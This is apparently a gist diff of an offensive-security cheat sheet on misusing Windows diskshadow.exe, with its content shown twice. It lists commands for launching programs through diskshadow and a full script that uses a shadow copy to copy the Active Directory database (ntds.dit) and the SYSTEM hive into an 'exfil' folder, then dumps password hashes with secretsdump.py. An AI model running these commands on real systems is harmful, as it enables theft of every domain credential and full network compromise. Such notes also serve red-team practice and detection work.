bohops · May 21, 2018 02:21
diff --git a/diskshadow.txt b/diskshadow.txt
 Execute
 =======

 *Interactive Mode

 cmd.exe
 c:\windows\system32\diskshadow.exe
 > exec calc.exe
 > exec "cmd.exe" /c calc.exe
 > exit


 *Script Mode

 - Create a script (txt) file (e.g. diskshadow.txt)

 exec calc.exe
 exec notepad.exe

 - Run Script

 diskshadow.exe /s c:\test\diskshadow.txt


 -----------------------
 Extract AD DB
 =============

 - Create Sscript (diskshadow.txt)

 set context persistent nowriters
 add volume c: alias someAlias
 create
 expose %someAlias% z:
 exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
 delete shadows volume %someAlias%
 reset

 - Run the Script

 diskshadow.exe /s c:\diskshadow.txt

 - Capture the System Registry Hive

 reg.exe save hklm\system c:\exfil\system.bak

 -Copy off the AD DB/System Hive and extract hashes with SecretsDump

 secretsdump.py -ntds ntds.dit -system system.bak LOCAL
	Execute
	=======

	*Interactive Mode

	cmd.exe
	c:\windows\system32\diskshadow.exe
	> exec calc.exe
	> exec "cmd.exe" /c calc.exe
	> exit


	*Script Mode

	- Create a script (txt) file (e.g. diskshadow.txt)

	exec calc.exe
	exec notepad.exe

	- Run Script

	diskshadow.exe /s c:\test\diskshadow.txt


	-----------------------
	Extract AD DB
	=============

	- Create Sscript (diskshadow.txt)

	set context persistent nowriters
	add volume c: alias someAlias
	create
	expose %someAlias% z:
	exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
	delete shadows volume %someAlias%
	reset

	- Run the Script

	diskshadow.exe /s c:\diskshadow.txt

	- Capture the System Registry Hive

	reg.exe save hklm\system c:\exfil\system.bak

	-Copy off the AD DB/System Hive and extract hashes with SecretsDump

	secretsdump.py -ntds ntds.dit -system system.bak LOCAL